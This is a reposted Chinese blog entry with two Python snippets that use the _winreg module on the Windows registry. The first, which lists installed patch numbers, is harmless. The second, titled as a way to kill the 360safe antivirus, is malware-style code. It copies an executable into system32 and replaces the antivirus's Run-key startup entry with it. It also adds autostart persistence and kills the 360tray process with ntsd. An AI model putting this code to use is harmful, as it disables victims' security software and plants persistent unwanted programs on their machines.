注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

哈欠涟涟的博客

学习python、pyqt与django

 
 
 

日志

 
 

python操作注册表两例  

2008-10-05 13:26:01|  分类: python |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

引用于http://www.sqlite.com.cn/MySqlite/11/495.Html

在Python的标准库中,_winreg.pyd可以操作Windows的注册表,另外第三方的win32库封装了大量的Windows API,使用起来也很方便。不过这里介绍的是使用_winreg操作注册表,毕竟是Python自带的标准库,无需安装第三方库。

下 面的例子是通过Python获取Windows XP下已经安装的补丁号。Windows的补丁号都在“HKEY_LOCAL_MACHINE\SOFTWARE\\Microsoft\\ Updates”下,通过循环下面所有的目录节点,如果找到的名称符合正则表达式KB(\d{6}).*,则表示是一个补丁号。

从例子可以看出操作起来非常的简单和快速。

# -*- coding: utf-8 -*-

# 获取Windows的已打的补丁号

from _winreg import *

import re

def subRegKey(key, pattern, patchlist):

    # 个数

    count = QueryInfoKey(key)[0]

    for index in range(count):

        # 获取标题

        name = EnumKey(key, index)

        result = patch.match(name)

        if result:

            patchlist.append(result.group(1))

        sub = OpenKey(key, name)

        subRegKey(sub, pattern, patchlist)

        CloseKey(sub)

if __name__ == '__main__':

    patchlist = []

    updates = 'SOFTWARE\\Microsoft\\Updates'

    patch = re.compile('(KB\d{6}).*')

    key = OpenKey(HKEY_LOCAL_MACHINE, updates)

    subRegKey(key, patch, patchlist)

    print 'Count: ' + str(len(patchlist))

    for p in patchlist:

        print p

    CloseKey(key)

http://tenyears.cn/index.php/2007/01/26/python-win-registry.html

用python修改注册表干掉360safe

import _winreg

import os

import shutil

#复制自身

shutil.copyfile('K3.exe','c:\WINDOWS\system32\K3.exe')

#把360启动改为自身

run = _winreg.OpenKey(

      _winreg.HKEY_LOCAL_MACHINE,

      "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0,_winreg.KEY_WRITE

      )

_winreg.SetValueEx(

      run,"360Safetray",0,_winreg.REG_SZ,

      r"C:\WINDOWS\system32\k3.exe"

      )

#添加自启动

self = _winreg.OpenKey(

      _winreg.HKEY_LOCAL_MACHINE,

      "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0,_winreg.KEY_WRITE

      )

_winreg.SetValueEx(

      run,"k3",0,_winreg.REG_SZ,

      r"C:\WINDOWS\system32\k3.exe"

      )

#添加所有用户启动

allrun = _winreg.OpenKey(

      _winreg.HKEY_LOCAL_MACHINE,

      "Microsoft\Windows\CurrentVersion\policies\Explorer\Run",0,_winreg.KEY_WRITE

      )

_winreg.SetValueEx(

      allrun,"k3",0,_winreg.REG_SZ,

      r"C:\WINDOWS\system32\k3.exe"

      )

#终止360进程

os.popen("ntsd -c q -pn 360tray.exe cmd")

  评论这张
 
阅读(136)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017